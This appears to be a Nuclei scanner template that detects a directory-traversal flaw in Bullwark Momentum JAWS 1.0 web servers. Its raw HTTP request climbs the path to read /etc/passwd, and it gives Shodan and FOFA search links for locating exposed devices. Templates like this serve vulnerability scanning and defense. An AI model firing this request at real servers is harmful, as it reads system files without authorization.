id: bullwark-momentum-lfi info: name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal author: pikpikcu severity: high # Refrence:-https://www.exploit-db.com/exploits/47773 # Vendor Homepage: http://www.bullwark.net/ # Version : Bullwark Momentum Series Web Server JAWS/1.0 # Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # Shodan Dork: https://www.shodan.io/search?query=Bullwark&page=1 # fofa dork:-https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D requests: - raw: - | GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 X-Requested-With: XMLHttpRequest Referer: {{Hostname}} matchers-condition: and matchers: - type: status status: - 200 - type: word word: - "root:"